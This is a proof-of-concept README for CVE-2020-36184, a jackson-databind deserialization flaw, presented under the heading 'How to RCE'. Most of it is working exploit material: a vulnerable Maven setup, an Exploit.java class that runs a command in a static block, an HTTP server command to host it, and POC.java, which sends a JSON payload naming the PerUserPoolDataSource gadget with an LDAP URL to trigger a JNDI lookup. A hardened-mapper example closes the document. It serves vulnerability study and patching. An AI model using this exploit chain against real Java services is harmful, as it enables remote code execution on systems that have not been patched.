
CVE-2020-36184 PoC — FasterXML jackson-databind code issue vulnerability

Associated Vulnerability
Title: FasterXML jackson-databind code issue vulnerability (CVE-2020-36184)
Description: FasterXML jackson-databind is a Java library that converts data formats such as XML and JSON to and from Java objects. Jackson can easily convert Java objects into JSON objects and XML documents, and likewise convert JSON and XML back into Java objects. FasterXML jackson-databind 2.x before 2.9.10.8 has a code issue vulnerability; the flaw stems from org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource incorrectly handling se
Description
CVE-2020-36184 && Jackson-databind RCE
Readme
## Description
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource.

## How to RCE

pom.xml

```
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>com.jacksonTest</groupId>
    <artifactId>jacksonTest</artifactId>
    <version>1.0-SNAPSHOT</version>
    <dependencies>
        <dependency>
            <groupId>com.fasterxml.jackson.core</groupId>
            <artifactId>jackson-databind</artifactId>
            <version>2.9.10.7</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/org.apache.tomcat/tomcat-dbcp -->
        <dependency>
            <groupId>org.apache.tomcat</groupId>
            <artifactId>tomcat-dbcp</artifactId>
            <version>10.0.0</version>
        </dependency>

        <dependency>
            <groupId>org.slf4j</groupId>
            <artifactId>slf4j-nop</artifactId>
            <version>1.7.2</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
        <dependency>
            <groupId>javax.transaction</groupId>
            <artifactId>jta</artifactId>
            <version>1.1</version>
        </dependency>
    </dependencies>
</project>
```

Exploit.java
```
import java.lang.Runtime;

public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
SimpleServer
```
python -m SimpleHTTPServer 4444
```

LDAPServer

![ldap](img/ldap.png)


POC.java

```
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;


public class POC {
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
        String json = "[\"org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource\", {\"dataSourceName\":\"ldap://127.0.0.1:1399/Exploit\"}]";
        Object obj = mapper.readValue(json, Object.class);
        mapper.writeValueAsString(obj);

    }
}
```

Result:

![result](img/result.png)

## Gadget Chain
```
PerUserPoolDataSource
    -> InstanceKeyDataSource.setDataSourceName
        -> InstanceKeyDataSource.getConnection
            -> InstanceKeyDataSource.testCPDS
                -> lookup
```
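As an added defensive counterpart (not part of the original PoC repository), the payload from POC.java is refused when the blanket `enableDefaultTyping()` is replaced by an allowlisting `PolymorphicTypeValidator`, available from jackson-databind 2.10 onward; the `com.example.app.` package prefix stands in for an assumed application namespace. Because the type id is denied during resolution, the chain above never starts: `PerUserPoolDataSource` is not instantiated, so `setDataSourceName` and the JNDI `lookup` are never reached.

```java
import java.io.IOException;
import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class HardenedMapper {
    // The polymorphic payload from POC.java, used here only as input that the
    // hardened mapper must refuse (the LDAP URL is never dereferenced).
    static final String PAYLOAD =
        "[\"org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource\","
        + " {\"dataSourceName\":\"ldap://127.0.0.1:1399/Exploit\"}]";

    // Weak configuration, as in POC.java: any class on the classpath may be
    // named by a type id. Shown for contrast only; never feed it untrusted input.
    static ObjectMapper weakMapper() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // deprecated since 2.10 for this reason
        return mapper;
    }

    // Hardened configuration: type ids resolve only to subtypes under an
    // application-owned package prefix (assumed here: com.example.app.).
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfSubType("com.example.app.")
            .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return mapper;
    }

    // True when the mapper refuses the payload during type-id resolution, i.e.
    // before PerUserPoolDataSource is instantiated and setDataSourceName runs.
    static boolean rejects(ObjectMapper mapper, String json) {
        try {
            mapper.readValue(json, Object.class);
            return false;
        } catch (JsonMappingException e) {
            // InvalidTypeIdException: "Configured `PolymorphicTypeValidator`
            // ... denied resolution" for the gadget class name
            return true;
        } catch (IOException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println("hardened mapper rejects payload: " + rejects(hardenedMapper(), PAYLOAD));
    }
}
```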
